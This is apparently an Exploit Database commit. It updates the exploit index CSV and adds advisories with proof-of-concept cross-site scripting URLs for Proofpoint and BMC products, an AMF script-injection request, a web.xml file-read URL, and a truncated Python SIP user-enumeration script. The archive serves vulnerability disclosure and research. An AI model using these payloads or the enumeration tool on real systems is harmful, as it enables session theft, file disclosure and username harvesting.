Update: 2015-01-07

13 new exploits
This commit is contained in:
Offensive Security 2015-01-07 08:36:08 +00:00
parent 14036ab825
commit c263b4d439
14 changed files with 473 additions and 16 deletions


@ -8098,7 +8098,7 @@ id,file,description,date,author,platform,type,port
8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi ) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0
8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
@ -10011,7 +10011,7 @@ id,file,description,date,author,platform,type,port
10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DoS (0day)",2009-12-31,emgent,php,dos,80
10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0
10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure Vulnerability",2009-12-30,FL0RiX,php,webapps,0
10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0
10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0
10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0
10825,platforms/php/dos/10825.sh,"Wordpress <= 2.9 - DoS (0day)",2009-12-31,emgent,php,dos,80
10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 and 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80
@ -10885,7 +10885,7 @@ id,file,description,date,author,platform,type,port
11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC",2010-03-29,mat,windows,dos,0
11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,indoushka,asp,webapps,0
11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - (.exe) Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0
11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 - SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0
11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0
11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0
@ -10961,7 +10961,7 @@ id,file,description,date,author,platform,type,port
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-04-03,mr_me,windows,local,0
12025,platforms/windows/dos/12025.php,"Dualis 20.4 - (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0
12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0
12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0
12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0
12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0
12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0
@ -11417,7 +11417,7 @@ id,file,description,date,author,platform,type,port
12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection Vulnerability",2010-05-08,v3n0m,php,webapps,0
12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0
12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0
12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman Upload Vulnerability",2010-05-08,Sid3^effects,php,webapps,0
12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Meta)",2010-05-08,blake,windows,local,0
12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0
@ -12951,7 +12951,7 @@ id,file,description,date,author,platform,type,port
14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0
14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0
14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - ""newclass"" invalid pointer",2010-09-01,Abysssec,windows,remote,0
14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
@ -13251,7 +13251,7 @@ id,file,description,date,author,platform,type,port
15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0
15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0
@ -14891,7 +14891,7 @@ id,file,description,date,author,platform,type,port
17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,metasploit,windows,remote,25
17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,metasploit,windows,remote,9090
17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 - (.visprj) Buffer Overflow",2011-04-11,metasploit,windows,local,0
17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console st_upload RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0
17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0
17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0
17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability",2011-04-12,"C4SS!0 G0M3S",windows,local,0
17158,platforms/windows/local/17158.txt,"Microsoft HTML Help <= 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0
@ -18145,7 +18145,7 @@ id,file,description,date,author,platform,type,port
20873,platforms/php/webapps/20873.html,"RV Article Publisher CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0
20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0
20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0
20877,platforms/hardware/webapps/20877.txt,"Conceptronic GrabnGo and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal Vulnerability",2001-05-23,joetesta,cgi,remote,0
20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0
20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0
@ -18293,7 +18293,7 @@ id,file,description,date,author,platform,type,port
21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 UDP Denial of Service Vulnerability",2001-07-25,blackangels,hardware,dos,0
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4,Trend Micro ScanMail 1.0 SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal Vulnerability",2001-07-26,john@interrorem.com,windows,remote,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic GrabnGo Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",2012-09-07,metasploit,windows,remote,3200
21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password Vulnerability",2001-07-26,John,windows,remote,0
@ -26230,7 +26230,7 @@ id,file,description,date,author,platform,type,port
29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - (.plf) Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0
29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities",2013-10-28,Vulnerability-Lab,php,webapps,0
29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0
29266,platforms/hardware/webapps/29266.txt,"Stem Innovation IZON Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0
29266,platforms/hardware/webapps/29266.txt,"Stem Innovation 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0
29267,platforms/php/webapps/29267.txt,"ProNews 1.5 admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0
29268,platforms/php/webapps/29268.txt,"ProNews 1.5 lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0
29269,platforms/php/webapps/29269.txt,"ProNews 1.5 lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0
@ -27066,7 +27066,7 @@ id,file,description,date,author,platform,type,port
30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 - Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
@ -27383,8 +27383,8 @@ id,file,description,date,author,platform,type,port
30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0
30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0
30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0
30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0
30556,platforms/php/webapps/30556.html,"Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0
30557,platforms/php/webapps/30557.txt,"Claroline 1.x admin/adminusers.php dir Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
@ -27887,7 +27887,7 @@ id,file,description,date,author,platform,type,port
31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' - Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0
31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0
@ -31337,7 +31337,7 @@ id,file,description,date,author,platform,type,port
34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross-Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0
34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross-Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection Vulnerability",2010-10-04,"Eugene Salov",php,webapps,0
34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 - Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
@ -32155,3 +32155,16 @@ id,file,description,date,author,platform,type,port
35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0
35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0
35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0
35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0
35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0
35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0
35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting Vulnerability",2011-05-03,Hector.x90,php,webapps,0
35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0
35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 'example.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 'index.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0


15
platforms/cgi/webapps/35698.txt Executable file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/47687/info
Proofpoint Protection Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Proofpoint Protection Server 5.5.5 is vulnerable; other versions may also be affected.
http://www.example.com:10020/enduser/process.cgi?cmd=release&;
recipient=xxx () yyy com au&
msg_id=%28MDYzMjU0NTJkYTQ0OWRhYjJlNWY1MjBhNzc5MDEwODlkZGY5OGIzMTc1MGI=%29&
locale=enus&x=580&y=470&displayprogress=t%22%20
onmouseover=%22alert%281%29%22%20name=%22frame_display%22%20id=%22
frame_display%22%20NORESIZE%20SCROLLING=%22no%22%20/%3E%3C!--

16
platforms/jsp/webapps/35706.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/47728/info
BMC Remedy Knowledge Management is prone to a default-account vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage the default account issue to bypass authentication and gain access without permission. Successful exploits can aid in further attacks.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Remedy Knowledge Management 7.5.00 is vulnerable; other versions may also be affected.
https://www.example.com/rkm/external.jsp?doc=&#039;%3balert(1)//&user=Self+Help
https://www.example.com/rkm/search.jsp?user=Self+Help&startDate=\&#039;%3balert(1)//
https://www.example.com/rkm/usersettings.jsp?"><script>alert(1)</script>
https://www.example.com/rkm/viewdoc.jsp?doc=><script>alert(1)</script>&user=Self%20Help
https://www.example.com/rkm/AttachmentServlet?="><script>alert(1)</script>
https://www.example.com/rkm/index.jsp?user=Self%20Help

73
platforms/jsp/webapps/35707.txt Executable file

@ -0,0 +1,73 @@
source: http://www.securityfocus.com/bid/47731/info
BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input.
A remote attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Exploiting the information-disclosure issues allows the attacker to view local files within the context of the webserver process.
a)
https://www.example.com/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm
b)
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>
c) multiple XSS within demo pages
https:/www.example.com/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>
https://www.example.com/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean
d) Multiple XSS as the AMF stream is unfiltered
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58..... ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation
bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#. name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade
results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651
......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber
codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d
Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.
2) Application is vulnerable to file source code reading limited to the
web-root.
https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml


@ -0,0 +1,210 @@
source: http://www.securityfocus.com/bid/47710/info
sipdroid is prone to a user-enumeration weakness.
An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
sipdroid 1.6.1, 2.0.1, and 2.2 running on Android 2.1 are vulnerable; other versions may also be affected.
#!/usr/bin/env python
# Adapted from SipVicious by Anibal Aguiar - anibal.aguiar *SPAM*
tempest.com.br
#
# This code is only for security researches/teaching purposes,use at
your own risk!
import sys
import random
def printmsg(msg, color):
OKGREEN = '\033[92m'
OKBLUE = '\033[96m'
ENDC = '\033[0m'
WARN = '\033[91m'
if color is "Blue":
return OKBLUE + msg + ENDC
elif color is "Green":
return OKGREEN + msg + ENDC
elif color is "WARNING":
return WARN + msg + ENDC
def makeRequest(method,dspname,toaddr,
dsthost,port,callid,srchost='',
branchunique=None,localtag=None,
extension=None,body='',useragent=None,
cseq=1,auth=None,contact='<sip:123@1.1.1.1>',
accept='application/sdp',contentlength=None,
localport=5060,contenttype=None):
if extension is None:
uri = 'sip:%s' % dsthost
else:
uri = 'sip:%s@%s' % (extension,dsthost)
if branchunique is None:
branchunique = '%s' % random.getrandbits(32)
headers = dict()
finalheaders = dict()
superheaders = dict()
superheaders['Via'] = 'SIP/2.0/UDP %s:%s;branch=z9hG4bK%s;rport' %
(srchost,localport,branchunique)
headers['Max-Forwards'] = 70
headers['To'] = uri
headers['From'] = "\"%s\"" % dspname
if useragent is None:
headers['User-Agent'] = 'friendly-scanner'
headers['From'] += ';tag=as%s' % localtag
headers['Call-ID'] = "%s@%s" % (callid,srchost)
if contact is not None:
headers['Contact'] = contact
headers['CSeq'] = '%s %s' % (cseq,method)
headers['Max-Forwards'] = 70
headers['Accept'] = accept
if contentlength is None:
headers['Content-Length'] = len(body)
else:
headers['Content-Length'] = contentlength
if contenttype is None and len(body) > 0:
contenttype = 'application/sdp'
if contenttype is not None:
headers['Content-Type'] = contenttype
r = '%s %s SIP/2.0\r\n' % (method,uri)
for h in superheaders.iteritems():
r += '%s: %s\r\n' % h
for h in headers.iteritems():
r += '%s: %s\r\n' % h
for h in finalheaders.iteritems():
r += '%s: %s\r\n' % h
r += '\r\n'
r += body
return r, branchunique
----[SIPDroid-Extension_Enum.py]----------------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Anibal Aguiar - anibal.aguiar *SPAM* tempest.com.br
#
# Dependences:
#
# optparse - The optparse library can be installed using the linux
repository
# of your distro.
#
# myHelper -- myHelper.py should be placed at the same diretory of
